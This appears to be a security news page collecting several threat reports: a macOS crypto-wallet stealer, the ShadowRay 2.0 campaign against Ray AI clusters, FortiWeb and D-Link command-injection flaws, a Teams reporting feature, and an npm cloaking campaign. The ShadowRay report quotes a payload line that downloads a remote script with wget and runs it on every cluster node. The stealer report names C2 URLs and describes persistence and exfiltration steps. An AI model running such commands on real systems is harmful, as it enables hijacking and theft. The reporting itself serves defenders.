The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert regarding a critical OS command injection vulnerability in Fortinet FortiWeb, warning that the flaw is actively being exploited in real-world attacks. The vulnerability, tracked as CVE-2025-58034, allows authenticated attackers to execute unauthorized code on affected systems through specially crafted HTTP requests or command-line interface […]
A new malware campaign targeting macOS users has emerged with a dangerous focus on cryptocurrency wallet theft.
The malware, called Nova Stealer, uses a clever approach to trick victims by replacing genuine cryptocurrency applications with fake versions that steal wallet recovery phrases.
This bash-based stealer has been identified attacking users of popular cryptocurrency wallets, including Ledger Live, Trezor Suite, and Exodus.
The attack starts when an unknown dropper downloads and runs a script called mdriversinstall.sh from the command-and-control server at hxxps://ovalresponsibility[.]com/mdriversinstall[.]sh.
This initial script creates a hidden directory at ~/.mdrivers and installs several component,s including a script manager and launcher.
The malware generates a unique user ID using the uuidgen command and stores it in ~/.mdrivers/user_id.txt to track infected systems.
BruceKetta.space security researchers identified the Nova Stealer campaign and noted its modular design. The malware uses an orchestrator script called mdriversmngr.sh that downloads additional modules from the command-and-control server.
These modules come encoded in base64 format and are stored under ~/.mdrivers/scripts. The malware achieves persistence by creating a LaunchAgent plist file labeled application.com.artificialintelligence that ensures the scripts run automatically at every system startup.
One particularly interesting technique used by Nova Stealer is running scripts inside detached screen sessions using the command screen -dmS <name> <path>.
This approach keeps the malicious processes running independently in the background, hidden from the user’s view. The processes even survive when users log out because they run as daemon sessions with the -dmS flag.
Application Swapping and Seed Phrase Theft
Nova Stealer’s most dangerous capability involves swapping legitimate cryptocurrency wallet applications with fake versions.
The malware component mdriversswaps.sh detects if Ledger Live or Trezor Suite are installed on the system by checking paths in /Applications/.
When found, the script removes the original applications using rm -rf and deletes their Launchpad database entries through SQLite commands like DELETE FROM apps/items where title or ids match.
Nova (Source – BruceKetta.space)
The malware then downloads malicious replacement applications from specific domains, including hxxps://wheelchairmoments[.]com for fake Ledger Live and hxxps://sunrisefootball[.]com for fake Trezor Suite.
These ZIP archives are saved to ~/Library/LaunchAgents/ and extracted to replace the original applications. The malware modifies the Dock configuration using /usr/libexec/PlistBuddy to delete the old app entry and add a new one pointing to the fake application.
The fake wallet applications use Swift and WebKit to render phishing pages that look legitimate. When victims open what they believe is their wallet application, they see a recovery interface asking them to enter their seed phrases.
The malicious JavaScript code includes validation against BIP-39 and SLIP-39 word lists to provide auto-complete functionality, making the fake interface feel authentic.
Fake app execution (Source – BruceKetta.space)
As users type their recovery words, the data is sent to endpoints /seed and /seed2 with a 200-400ms delay after each keystroke, allowing attackers to capture partial phrases in real-time without waiting for final submission.
Nova Stealer also runs dedicated exfiltration modules. The mdriversfiles.sh component searches for and steals wallet files, including Trezor IndexedDB logs, Exodus files like passphrase.json and seed.seco, and Ledger’s app.json.
These files are uploaded to the command-and-control server every 20 hours using binary POST requests. Additionally, mdriversmetrics.sh collects system information, including installed applications, running processes, and Dock items, to help attackers profile victims and improve their campaigns.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
A newly discovered campaign has compromised tens of thousands of outdated or end-of-life (EoL) ASUS routers worldwide, predominantly in Taiwan, the U.S., and Russia, to rope them into a massive network.
The router hijacking activity has been codenamed Operation WrtHug by SecurityScorecard’s STRIKE team. Southeast Asia and European countries are some of the other regions where infections have
ESET researchers have uncovered a sophisticated attack chain orchestrated by the China-aligned threat actor PlushDaemon, revealing how the group leverages a previously undocumented network implant, EdgeStepper, to conduct adversary-in-the-middle attacks. By compromising network devices and redirecting DNS queries to malicious servers, PlushDaemon intercepts legitimate software updates and replaces them with trojanized versions containing the SlowStepper […]
Cybersecurity researchers have uncovered an active global hacking campaign leveraging a known flaw in Ray, an open-source AI framework widely used for managing distributed computing tasks.
Dubbed ShadowRay 2.0, this attack exploits vulnerability CVE-2023-48022 to silently seize control of powerful AI computing clusters and turn them into cryptocurrency mining operations.
The campaign represents a significant escalation from the initial ShadowRay discovery in March 2024, with attackers employing sophisticated tactics to remain hidden while extracting maximum value from compromised infrastructure.
Oligo Security researchers identified the attack campaign in early November 2025, discovering that threat actors using the name IronErn440 have weaponized Ray’s legitimate orchestration features into tools for self-propagating attacks.
What makes this threat particularly alarming is the sheer scale of exposure. The number of exposed Ray servers worldwide has grown from thousands during the original discovery to more than 230,000 instances today.
Many belong to active startups, research laboratories, and cloud-hosting providers, creating an expansive attack surface.
Oligo Security security analysts identified the attack after observing region-aware malware being distributed through GitLab.
The attackers initially leveraged the DevOps platform to deliver customized payloads adapted to each victim’s geographic location.
After GitLab took down the malicious repository on November 5, 2025, the threat actors quickly migrated their operation to GitHub, demonstrating remarkable operational agility.
By November 10, they had established a new repository and continued their campaign with even greater sophistication.
AI Attacking AI Infrastructure
The attack unfolds through multiple coordinated stages, beginning with reconnaissance using interact.sh, an out-of-band platform that lets attackers identify vulnerable servers without traditional noisy scanning.
Attackers send probes targeting Ray’s unprotected Jobs API, triggering callbacks from vulnerable instances. Once targets are identified, they exploit the unauthenticated Ray dashboard to submit malicious jobs that execute arbitrary code with cluster privileges.
Ray Cluster (Source – Oligo)
The most notable aspect is the use of AI-generated payloads. The attackers deploy Python code that automatically discovers available cluster resources, calculates 60 percent CPU and GPU allocation to avoid immediate detection, and then injects cryptocurrency miners disguised as legitimate system processes.
The payloads demonstrate sophisticated error handling and self-adaptation, suggesting they were generated or refined using AI tools to accelerate payload development.
A critical code snippet shows the multi-stage infection mechanism. The initial access payload uses Ray’s NodeAffinitySchedulingStrategy to enumerate cluster nodes and deploy infection scripts to each one:-
nodes=[n for n in ray.nodes() if n.get('Alive', False)]
cmd='wget -qO- https://gitlab.com/ironern440-group/ironern440-project/-/raw/main/aa_clean.sh && chmod +x aa_clean.sh && ./aa_clean.sh'
[ray.get(ray.remote(lambda:subprocess.run(cmd,shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy...
The attackers establish persistence through multiple mechanisms: cron jobs executing every fifteen minutes, systemd service hijacking, and SSH key injection into root accounts.
They mask malicious processes by renaming them to appear as legitimate kernel workers like [kworker/0:0] and dns-filter services, effectively hiding in plain sight.
Mining Pool Statistics (Source – Oligo)
What sets this campaign apart is the active competition dynamics. Attackers deploy scripts to detect and terminate rival cryptocurrency miners, then block competing mining pools through iptables rules and host file modifications.
They even target pools on specific ports used by competing threat actors, revealing an underground ecosystem where multiple criminal groups fight for the same compromised resources.
The infrastructure adaptation is equally concerning. For victims in China, attackers deliver region-specific payloads through proxy services to bypass network restrictions.
They employ geographic detection via ip-api.com, executing different scripts for Chinese versus international targets.
The attackers continuously update their payloads through GitLab commits, treating infrastructure as code and enabling real-time evolution of their techniques without redeploying to victim machines.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about a critical vulnerability affecting Fortinet FortiWeb appliances that threat actors are currently exploiting in active attacks.
The agency added CVE-2025-58034 to its Known Exploited Vulnerabilities (KEV) catalog on November 18, 2025, signaling immediate risk to organizations using the affected product.
The vulnerability identified as CVE-2025-58034 is an OS command injection weakness categorized under CWE-78.
This security flaw allows authenticated attackers to execute unauthorized code on the underlying operating system of FortiWeb devices.
Critical OS Command Injection Flaw
Exploitation occurs through specially crafted HTTP requests or command-line interface (CLI) commands that bypass security controls and grant attackers direct access to system-level functions.
Despite requiring authentication, this vulnerability poses a significant threat because attackers who gain initial access can leverage it to escalate privileges and execute malicious code.
This can lead to complete system compromise, data theft, and potential deployment of ransomware or other malware.
CISA has mandated that federal agencies must apply security patches and mitigations by November 25, 2025, giving organizations just seven days to remediate the vulnerability.
The directive follows Binding Operational Directive (BOD) 22-01, which requires agencies to address known exploited vulnerabilities within strict timeframes.
Organizations using Fortinet FortiWeb are strongly urged to follow vendor instructions immediately. Fortinet has released security updates and mitigation guidance that administrators should implement without delay.
CISA recommends following applicable cloud service guidance or discontinuing use of vulnerable products until proper security measures can be implemented.
The active exploitation of this vulnerability underscores the importance of keeping security patches up to date and monitoring vendor advisories for enterprise security infrastructure.
In October 2025, Morphisec’s anti-ransomware prevention platform detected and neutralized a sophisticated cyberattack targeting a major U.S. real estate company. The campaign showcased the emerging threat posed by the Tuoni C2 framework a free, modular command-and-control tool designed to deliver stealthy, in-memory payloads while evading traditional security defenses. What made this attack particularly notable was the […]
Microsoft is introducing a new capability in Teams that allows users to report messages they believe were mistakenly flagged as security threats.
The feature represents a significant step toward improving detection accuracy and reducing false positives across organizations worldwide. Completion of availability is expected by the end of November 2025.
The reporting feature enables users to provide direct feedback on messages containing URLs incorrectly identified as malicious.
This user-driven approach creates a valuable feedback mechanism that helps Microsoft refine its threat detection models over time.
Organizations using Microsoft Defender for Office 365 Plan 2 or Microsoft Defender XDR can leverage this capability to strengthen their security operations.
When users report incorrect detections, submissions are stored in the Microsoft Defender portal’s Submissions tab.
Creating a centralized repository for security teams to review and analyze false positive patterns.
This data helps Microsoft improve AI and machine learning models that classify threats, making detection systems gradually more accurate.
The feature will be available across all Microsoft Teams platforms, including Android, Desktop (Windows), iOS, Mac, and Web.
This comprehensive rollout ensures users can report threats regardless of their device preference, improving access and participation in the feedback process.
Teams admin center
Microsoft Teams Report Messages Feature
Organizations must complete two critical configuration steps for the feature to function correctly.
First, admins should navigate to the Teams admin center and enable “Report incorrect security detections” under Messaging settings > Messaging safety.
Second, the corresponding setting must be enabled in the Microsoft Defender portal, both settings must be activated simultaneously for full functionality.
Ensure the corresponding setting is enabled
For new users, the Microsoft Defender setting is on by default. Existing users have to turn it on themselves to start getting user reports. This feature also adds new data storage at Microsoft.
User submissions regarding incorrectly flagged messages are retained in the Defender portal, and admins can control feature access through Entra ID group membership.
This ensures organizations maintain governance over who can report threats while continuously applying user feedback to improve detection accuracy.
Multiple critical vulnerabilities affect D-Link DIR-878 routers across all models and firmware revisions. These devices reached the end of life on January 31, 2021. They will no longer receive security updates or technical support from D-Link Corporation.
The vulnerabilities allow remote attackers to gain complete control of affected routers without requiring authentication.
Two of the most severe vulnerabilities (CVE-2025-60672 and CVE-2025-60673) involve command injection flaws in the program’s CGI web interface.
Attackers can craft specially designed HTTP requests targeting the SetDynamicDNSSettings and SetDMZSettings functionality to execute arbitrary commands on the device.
D-Link discovered the first flaw, which exploits improper handling of the ServerAddress and Hostname parameters, stored in NVRAM without sanitization.
The second vulnerability affects the IPAddress parameter in DMZ settings, which is similarly used without validation by the librcm.so library.
Both issues carry critical CVSS scores of 9.8, meaning remote attackers can execute code without authentication or user interaction.
CVE ID
Vulnerability Type
CVSS Score
Attack Vector
Impact
CVE-2025-60672
Command Injection
9.8 (Critical)
Network/No Auth Required
Remote Code Execution
CVE-2025-60673
Command Injection
9.8 (Critical)
Network/No Auth Required
Remote Code Execution
CVE-2025-60674
Stack Buffer Overflow
8.5 (High)
Physical Access/USB
Arbitrary Code Execution
CVE-2025-60676
Command Injection
8.5 (High)
Local/Write Access to /tmp
Arbitrary Command Execution
CVE-2025-60674 describes a stack buffer overflow in the rc binary’s USB storage-handling module, triggered when USB device serial numbers are improperly read.
This vulnerability requires physical access or control over a USB device but allows arbitrary code execution on the router. CVE-2025-60676 affects the timelycheck and sysconf binaries, permitting attackers with write access to/tmp/new_qos.
The rule file has a flaw that lets attackers run unwanted commands because the system joins text together without checking it. D-Link strongly recommends that users upgrade to current-generation products or immediately perform comprehensive data backups.
Organizations deploying DIR-878 routers should isolate these devices from untrusted networks and implement restrictive firewall rules.
D-Link’s advisory emphasizes that end-of-life products may harm other connected devices, and continued use poses significant security risks.
Users unable to upgrade should ensure devices run the latest available firmware and maintain strong, unique administrative passwords with Wi-Fi encryption enabled.
A sophisticated malware campaign targeting the npm ecosystem has emerged, deploying a clever detection system that distinguishes between regular users and security researchers.
The threat actor, operating under the alias dino_reborn, created seven malicious npm packages designed to redirect users to crypto-themed scam sites while evading security detection.
This intricate operation represents a new frontier in supply chain attacks, combining traffic cloaking technology with browser-based evasion techniques to deliver precision-targeted malicious content.
The campaign leverages a set of contaminated packages including signals-embed, dsidospsodlks, applicationooks21, application-phskck, integrator-filescrypt2025, integrator-2829, and integrator-2830.
Six of these packages contain 39 kilobytes of malware code, while the seventh constructs a malicious webpage. When users visit the website deployed by these packages, the malware automatically analyzes their behavior and system characteristics to determine their threat level.
The threat actor then serves dramatically different experiences based on this classification—victims encounter a convincing fake CAPTCHA leading to malicious destinations, while researchers see only blank pages hiding the true nature of the attack.
Malicious packages on npm (Source – Socket.dev)
Socket.dev security analysts identified and documented this complex campaign after discovering the interconnected infrastructure linking all packages to a single threat actor.
The research team traced the creation email to geneboo@proton[.]me and uncovered how the attacker was using Adspect, a legitimate cloaking service designed to distinguish between bots and real visitors.
By weaponizing this technology within npm packages, the attacker found a way to distribute self-contained malicious code that automatically gates access to harmful payloads based on sophisticated fingerprinting.
The campaign’s success stems from its multi-layered approach to evading both automated security scanners and human analysis. Upon deployment, the malware wraps its code in an Immediately Invoked Function Expression (IIFE), ensuring it executes automatically without requiring explicit function calls.
The code aggressively blocks researcher access by disabling browser developer tools, preventing right-click context menus, blocking keyboard shortcuts like F12, Ctrl+U, and Ctrl+Shift+I, and continuously reloading the page if DevTools are detected.
Technical Analysis of the Detection Evasion Mechanism
The malware’s ability to distinguish victims from researchers relies on a sophisticated fingerprinting system that collects thirteen distinct data points about each visitor.
When a user accesses the compromised website, the JavaScript payload gathers information, including the browser user agent, host information, referrer URL, request method, server hostname, protocol encryption status, request timestamp, language preferences, and accepted encoding formats.
This comprehensive data collection creates a detailed profile that gets transmitted to the Adspect API through a proxy endpoint, such as association-google.xyz/adspect-proxy.php, effectively reconstructing server-side request capabilities within the browser environment.
The decision-making logic represents the campaign’s core innovation. When Adspect receives the fingerprint data, it analyzes the traffic characteristics and returns a response indicating whether the visitor appears legitimate or suspicious.
If the API determines the traffic originates from a researcher, it returns an “ok: false” status, triggering the display of a blank white page containing only generic text about Offlido, a fake offline storage company.
This benign page provides perfect cover, appearing completely legitimate to any analyst who might inspect it. Conversely, if Adspect determines the visitor is a potential victim, it returns “ok: true” along with a malicious redirect URL and triggers display of a fake CAPTCHA interface.
The CAPTCHA mimics real verification systems from legitimate crypto exchanges like Uniswap and Jupiter, borrowing their branding to build false credibility.
When victims click the verification checkbox, a three-second loading animation plays before showing success, followed by automatic redirection to the malicious URL in a new browser tab.
This psychological manipulation, combined with the familiar CAPTCHA interface, increases the likelihood that victims will trust and engage with the redirect without suspicion.
The attacker’s infrastructure flexibility represents another significant advantage. Because Adspect returns new redirect URLs on each request, the threat actor can rotate final destinations server-side without ever republishing any npm package, making traditional takedown efforts reactive rather than preventative.
This allows the campaign to remain operational even after initial detection and package removal from npm’s registry.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
.webp)
.webp)
.webp)
.webp)
.webp)